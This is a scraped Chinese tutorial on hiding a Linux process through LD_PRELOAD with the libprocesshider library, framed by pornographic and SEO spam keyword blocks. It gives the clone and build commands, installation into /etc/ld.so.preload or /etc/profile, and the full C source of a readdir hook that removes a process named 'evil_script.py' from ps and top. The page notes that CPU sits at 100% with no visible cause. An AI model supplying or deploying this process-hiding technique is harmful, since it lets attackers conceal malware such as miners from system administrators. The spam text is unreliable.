婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > linux 下隱藏進程的一種方法及遇到的坑

linux 下隱藏進程的一種方法及遇到的坑

熱門標簽:400電話申請找哪家公司 福州呼叫中心外呼系統哪家好 臨汾電銷機器人費用 地圖標注需要提交啥資料入駐 地圖標注w是什么方向 河南省鄭州市地圖標注 昆明外呼系統 新鄉人工智能電話機器人加盟 七大洲地圖標注

前言

1.本文所用到的工具在 https://github.com/gianlucaborello/libprocesshider 可以下載

2.思路就是利用 LD_PRELOAD 來實現系統函數的劫持

LD_PRELOAD是什么:

LD_PRELOAD是Linux系統的一個環境變量,它可以影響程序的運行時的鏈接(Runtime linker),它允許你定義在程序運行前優先加載的動態鏈接庫。這個功能主要就是用來有選擇性的載入不同動態鏈接庫中的相同函數。通過這個環境變量,我們可以在主程序和其動態鏈接庫的中間加載別的動態鏈接庫,甚至覆蓋正常的函數庫。一方面,我們可以以此功能來使用自己的或是更好的函數(無需別人的源碼),而另一方面,我們也可以以向別人的程序注入程序,從而達到特定的目的。

實現

1.下載程序編譯

bmfxgkpt-yhd:~# git clone https://github.com/gianlucaborello/libprocesshider.git
Cloning into 'libprocesshider'...
remote: Counting objects: 26, done.
remote: Total 26 (delta 0), reused 0 (delta 0), pack-reused 26
Unpacking objects: 100% (26/26), done.
bmfxgkpt-yhd:~# cd libprocesshider/
bmfxgkpt-yhd:~/libprocesshider# make
gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
bmfxgkpt-yhd:~/libprocesshider#

2.移動文件到/usr/local/lib/目錄下

mv libprocesshider.so /usr/local/lib/

3.把它加載到全局動態連接局

echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload

測試

1.我們運行evil_script.py

2.此時發現在top 與 ps 中都無法找到 evil_script.py

此時我們發現 cpu 100%,但是卻找不到任何占用cpu高的程序

分析

#define _GNU_SOURCE
#include <stdio.h>
#include <dlfcn.h>
#include <dirent.h>
#include <string.h>
#include <unistd.h>
/*
 * Every process with this name will be excluded
 */
static const char* process_to_filter = "evil_script.py";
/*
 * Get a directory name given a DIR* handle
 */
static int get_dir_name(DIR* dirp, char* buf, size_t size)
{
  int fd = dirfd(dirp);
  if(fd == -1) {
    return 0;
  }
  char tmp[64];
  snprintf(tmp, sizeof(tmp), "/proc/self/fd/%d", fd);
  ssize_t ret = readlink(tmp, buf, size);
  if(ret == -1) {
    return 0;
  }
  buf[ret] = 0;
  return 1;
}
/*
 * Get a process name given its pid
 */
static int get_process_name(char* pid, char* buf)
{
  if(strspn(pid, "0123456789") != strlen(pid)) {
    return 0;
  }
  char tmp[256];
  snprintf(tmp, sizeof(tmp), "/proc/%s/stat", pid);
  FILE* f = fopen(tmp, "r");
  if(f == NULL) {
    return 0;
  }
  if(fgets(tmp, sizeof(tmp), f) == NULL) {
    fclose(f);
    return 0;
  }
  fclose(f);
  int unused;
  sscanf(tmp, "%d (%[^)]s", &unused, buf);
  return 1;
}
#define DECLARE_READDIR(dirent, readdir)                \

static struct dirent* (*original_##readdir)(DIR*) = NULL;        \

struct dirent* readdir(DIR *dirp)                    \

{                                    \

  if(original_##readdir == NULL) {                  \

    original_##readdir = dlsym(RTLD_NEXT, "readdir");        \

    if(original_##readdir == NULL)                 \

    {                                \

      fprintf(stderr, "Error in dlsym: %s\n", dlerror());     \

    }                                \

  }                                  \

  struct dirent* dir;                         \

  while(1)                              \

  {                                  \

    dir = original_##readdir(dirp);                 \

    if(dir) {                            \

      char dir_name[256];                     \

      char process_name[256];                   \

      if(get_dir_name(dirp, dir_name, sizeof(dir_name)) &&    \

        strcmp(dir_name, "/proc") == 0 &&            \

        get_process_name(dir->d_name, process_name) &&     \

        strcmp(process_name, process_to_filter) == 0) {     \

        continue;                        \

      }                              \

    }                                \

    break;                             \

  }                                  \

  return dir;                             \

}
DECLARE_READDIR(dirent64, readdir64);
DECLARE_READDIR(dirent, readdir);

1.程序定義了一個變量 process_to_filter 來控制不顯示哪個進程名

2.重寫readdir,

strcmp(process_name, process_to_filter) == 0)

當發現當前進程名稱與 process_to_filter 相同時,繼續循環.

遇到的坑

1.某些Linux中這個程序編譯通不過

解決方法

刪除最后兩行中的一行

DECLARE_READDIR(dirent64, readdir64);
DECLARE_READDIR(dirent, readdir);

2.某些Linux中使用

shell echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
并不會生效
 此時我們需要配置環境變量
shell bmfxgkpt-yhd:~# vi /etc/profile
增加一行
shell export LD_PRELOAD=/usr/local/lib/libprocesshider.so

總結

以上所述是小編給大家介紹的linux 下隱藏進程的一種方法及遇到的坑,希望對大家有所幫助,如果大家有任何疑問請給我留言,小編會及時回復大家的。在此也非常感謝大家對腳本之家網站的支持!

標簽:烏海 股票 臨沂 鎮江 岳陽 ???/a> 紅河 四川

巨人網絡通訊聲明:本文標題《linux 下隱藏進程的一種方法及遇到的坑》,本文關鍵詞  linux,下,隱藏,進程,的,一種,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《linux 下隱藏進程的一種方法及遇到的坑》相關的同類信息!
  • 本頁收集關于linux 下隱藏進程的一種方法及遇到的坑的相關信息資訊供網民參考!
  • 推薦文章
    婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
    亚洲精品成人a在线观看| 免费黄网站欧美| 亚洲成人资源在线| 国产一区二区在线免费观看| 在线观看国产日韩| 久久影音资源网| 一区二区免费视频| 国产成人在线视频免费播放| 欧美色图免费看| 久久精品一二三| 亚洲mv大片欧洲mv大片精品| 国产精品一区二区久激情瑜伽| 色哟哟一区二区| 国产日韩av一区| 丝袜美腿亚洲综合| 色婷婷国产精品久久包臀| 久久久亚洲国产美女国产盗摄| 亚洲成人一二三| 99久久伊人网影院| 国产亚洲美州欧州综合国| 日韩国产高清在线| 欧洲国内综合视频| 亚洲免费在线播放| 丁香另类激情小说| 亚洲精品一区二区三区影院| 午夜电影网亚洲视频| 99re免费视频精品全部| 久久久久九九视频| 国产一区福利在线| 91精品国产91久久久久久最新毛片| 亚洲日本成人在线观看| 丁香五精品蜜臀久久久久99网站| 日韩一区二区不卡| 毛片av一区二区| 91精品国产乱码| 午夜国产精品一区| 欧美日韩一级二级| 亚洲成在人线免费| 91精品婷婷国产综合久久竹菊| 亚洲高清久久久| 欧洲人成人精品| 亚洲精品第1页| 91官网在线观看| 亚洲国产精品欧美一二99| 欧美性大战久久| 天堂影院一区二区| 777xxx欧美| 美女视频黄a大片欧美| 日韩精品专区在线| 国产麻豆视频精品| 国产精品女同互慰在线看| 99久久99久久久精品齐齐| 国产精品国产三级国产有无不卡| 99精品久久只有精品| 亚洲精品菠萝久久久久久久| 91高清视频免费看| 亚洲一区二区三区爽爽爽爽爽| 在线免费观看一区| 青青草原综合久久大伊人精品 | 久久久久久**毛片大全| 国产成人精品免费在线| 中文字幕日本不卡| 欧美日韩在线三区| 蜜桃久久久久久久| 中文字幕av一区二区三区高 | 欧美日韩一二三| 麻豆一区二区三区| 国产亚洲一区字幕| 91亚洲午夜精品久久久久久| 亚洲动漫第一页| 日韩一区二区三区免费观看| 国产99久久久国产精品| 亚洲午夜电影在线观看| 日韩视频免费观看高清在线视频| 国内精品嫩模私拍在线| 亚洲免费观看高清| 欧美sm美女调教| 97精品久久久午夜一区二区三区| 日本欧美大码aⅴ在线播放| 久久久国产精品午夜一区ai换脸| 色噜噜狠狠一区二区三区果冻| 日韩国产精品久久| 亚洲人成人一区二区在线观看| 在线成人免费视频| 成人国产电影网| 舔着乳尖日韩一区| 亚洲欧美一区二区三区极速播放 | 久久综合色天天久久综合图片| 99视频精品全部免费在线| 久久成人av少妇免费| 亚洲天堂福利av| 精品国产一区久久| 欧美性感一区二区三区| 99久久精品免费| 国产麻豆精品久久一二三| 五月天激情综合| 亚洲免费观看高清完整| 国产三级精品在线| 日韩一级大片在线观看| 欧美日韩一区高清| 色狠狠桃花综合| 丰满少妇在线播放bd日韩电影| 日韩国产一区二| 亚洲欧美日韩在线不卡| 国产精品午夜在线| 久久先锋影音av| 日韩免费电影一区| 欧美日韩黄视频| 91女神在线视频| 国产宾馆实践打屁股91| 国产一区二区视频在线| 激情久久久久久久久久久久久久久久| 亚洲国产成人精品视频| 一区二区国产盗摄色噜噜| 日韩码欧中文字| 日韩一区有码在线| 国产精品亲子伦对白| 国产精品网站导航| 国产精品天干天干在线综合| 国产亚洲精品福利| 国产视频一区不卡| 国产亚洲成aⅴ人片在线观看| 日韩精品综合一本久道在线视频| 日韩一区二区中文字幕| 日韩欧美中文字幕制服| 日韩一二三区视频| 日韩美女主播在线视频一区二区三区| 欧美一二区视频| 久久综合狠狠综合久久综合88| 精品第一国产综合精品aⅴ| 久久免费看少妇高潮| 久久久久九九视频| 中文字幕五月欧美| 亚洲第一二三四区| 天堂av在线一区| 精品在线播放午夜| 国产精品1区二区.| 成人激情图片网| 99re66热这里只有精品3直播 | 一本大道久久精品懂色aⅴ| 色偷偷88欧美精品久久久| 欧美色综合网站| 欧美一级一区二区| 国产欧美精品一区二区色综合朱莉| 日本一区二区免费在线| 亚洲三级在线看| 婷婷夜色潮精品综合在线| 久久黄色级2电影| 成人免费高清视频在线观看| 91精品福利视频| 7777女厕盗摄久久久| 久久这里只有精品6| 一区二区三区免费在线观看| 日韩电影一区二区三区| 东方aⅴ免费观看久久av| 日本高清成人免费播放| 日韩一区二区在线看片| 中文字幕在线观看一区| 青青草97国产精品免费观看无弹窗版| 国产精品亚洲а∨天堂免在线| 91视频国产资源| 91精品麻豆日日躁夜夜躁| 中文字幕第一区综合| 亚洲成a天堂v人片| 成人一级黄色片| 91精品欧美久久久久久动漫| 亚洲国产精品t66y| 美女一区二区三区| 91精品办公室少妇高潮对白| 久久精品欧美一区二区三区麻豆| 亚洲伊人伊色伊影伊综合网| 极品美女销魂一区二区三区免费| 一本色道a无线码一区v| 久久久影院官网| 肉肉av福利一精品导航| 91在线视频免费91| 久久免费美女视频| 青青草国产成人99久久| 欧美性生活一区| 国产精品成人一区二区三区夜夜夜| 免费日韩伦理电影| 欧美视频完全免费看| 国产精品久久久久永久免费观看| 免费高清不卡av| 一本到一区二区三区| 国产精品美女一区二区| 国产精品综合在线视频| 欧美一级高清大全免费观看| 亚洲一区二区三区免费视频| 不卡的av电影| 中文字幕不卡在线播放| 激情综合网av| 日韩欧美成人一区二区| 免费在线观看一区| 91麻豆精品久久久久蜜臀| 亚洲一区二区中文在线| 在线亚洲一区观看| 亚洲美女淫视频| 91色|porny| 亚洲自拍都市欧美小说|